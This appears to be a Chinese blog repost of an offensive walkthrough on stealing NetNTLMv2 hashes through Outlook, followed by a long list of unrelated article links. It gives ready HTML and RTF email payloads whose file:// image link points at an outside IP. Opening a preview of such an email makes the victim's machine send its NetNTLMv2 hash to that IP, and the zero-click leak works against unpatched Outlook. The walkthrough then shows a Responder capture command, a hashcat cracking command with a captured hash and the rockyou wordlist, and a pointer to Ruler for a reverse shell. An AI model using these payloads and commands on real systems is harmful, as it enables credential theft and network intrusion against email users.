当前位置: 首页 > news >正文

使用 Outlook 窃取 NetNTLMv2 哈希

前言

如果目标系统没有运行最新版本的 Windows/Outlook,则可以制作这样的电子邮件,允许攻击者窃取受害者的 NetNTLMv2 哈希值,而无需用户进行任何交互 - 单击电子邮件预览它足以窃取哈希值。

武器化

让我们创建一个包含以下内容的新 HTML 文件:

<html><h1>holla good sir</h1><img src="file://157.230.60.143/download.jpg">
</html>

RTF 文件也有效:

{\rtf1{\field{\*\fldinst {INCLUDEPICTURE "file://157.230.60.143/test.jpg" \\* MERGEFORMAT\\d}}{\fldrslt}}}

然后通过单击窗口标题栏顶部的附件图标插入新文件:

图片

选择恶意messge.html,然后选择:Insert as Text

图片

您应该看到您的消息现在看起来像一个带有损坏图像的 HTML(在我们的例子中是预期的,因为图像的路径是假的):

图片

执行

启动以侦听来自受害者的传入 SMB 身份验证请求Responder

responder -I eth1 -v

.并将恶意电子邮件发送给受害者。

受害者视图

一旦受害者打开他们的 Outlook 并单击恶意电子邮件进行预览,他们的计算机将尝试向攻击者控制的服务器(运行 Responder)进行身份验证。这会将受害者的哈希值泄露给攻击者,然后他们可以尝试破解:NetNTLMv2

图片

一旦哈希值被盗,我们可以尝试破解它:

hashcat -m5600 'spotless::OFFENSE:6bdb56c8140cf8dc:FFEF94D55C2EB2DE8CF13F140687AD7A:0101000000000000A5A01FB2BE9ED401114D47C1916811640000000002000E004E004F004D00410054004300480001000A0053004D0042003100320004000A0053004D0042003100320003000A0053004D0042003100320005000A0053004D004200310032000800300030000000000000000000000000200000407D7D30819F03909981529F6ACA84502CFCC8B3555DBA34316F8914973DD03C0A0010000000000000000000000000000000000009001A0063006900660073002F00310030002E0030002E0030002E0035000000000000000000' -a 3 /usr/share/wordlists/rockyou.txt --force --potfile-disable

在这种情况下,我们可以看到用户有一个非常简单的密码,该密码立即被破解:

图片

下一步是使用 Ruler 从受害者公司网络获取反向 shell:

相关文章:

  • 植物大战僵尸杂交版如何手动修改金币钻石数
  • Golang | Leetcode Golang题解之第169题多数元素
  • Windows 通过代理服务器调用 openai 的 api
  • [大师C语言(第三十六篇)]C语言信号处理:深入解析与实战
  • UE4_材质_湿度着色器及Desaturation算法_ben材质教程
  • 头歌——机器、深度学习——手写体识别
  • Go语言之基础入门
  • 汉语拼音字母表 (声母表和韵母表)
  • 【AI大模型】驱动的未来:穿戴设备如何革新血液、皮肤检测与营养健康管理
  • Go团队的工作方式
  • 第一章 通信系统基本概念
  • 网络安全和信息安全
  • Python编程技巧:如何正确使用with语句(Python中with用法详解)
  • PostgreSQL与MySQL的区别探究
  • 上海媒体邀约的类型有哪些?分行业精准邀约
  • angular组件开发
  • co.js - 让异步代码同步化
  • Date型的使用
  • eclipse(luna)创建web工程
  • JavaScript 奇技淫巧
  • java概述
  • java架构面试锦集:开源框架+并发+数据结构+大企必备面试题
  • jquery ajax学习笔记
  • redis学习笔记(三):列表、集合、有序集合
  • Shadow DOM 内部构造及如何构建独立组件
  • spring cloud gateway 源码解析(4)跨域问题处理
  • VuePress 静态网站生成
  • vue从创建到完整的饿了么(11)组件的使用(svg图标及watch的简单使用)
  • Vue官网教程学习过程中值得记录的一些事情
  • Web标准制定过程
  • 笨办法学C 练习34:动态数组
  • 入口文件开始,分析Vue源码实现
  • 设计模式走一遍---观察者模式
  • 树莓派 - 使用须知
  • 哈罗单车融资几十亿元,蚂蚁金服与春华资本加持 ...
  • 扩展资源服务器解决oauth2 性能瓶颈
  • #Linux(帮助手册)
  • (14)Hive调优——合并小文件
  • (function(){})()的分步解析
  • (Java岗)秋招打卡!一本学历拿下美团、阿里、快手、米哈游offer
  • (Redis使用系列) Springboot 整合Redisson 实现分布式锁 七
  • (附源码)spring boot网络空间安全实验教学示范中心网站 毕业设计 111454
  • (附源码)ssm经济信息门户网站 毕业设计 141634
  • (转)德国人的记事本
  • .bat批处理(九):替换带有等号=的字符串的子串
  • .Net Attribute详解(上)-Attribute本质以及一个简单示例
  • .Net CoreRabbitMQ消息存储可靠机制
  • .Net FrameWork总结
  • .NET 的程序集加载上下文
  • .net操作Excel出错解决
  • .net网站发布-允许更新此预编译站点
  • .net中生成excel后调整宽度
  • /ThinkPHP/Library/Think/Storage/Driver/File.class.php  LINE: 48
  • @WebServiceClient注解,wsdlLocation 可配置
  • [bzoj2957]楼房重建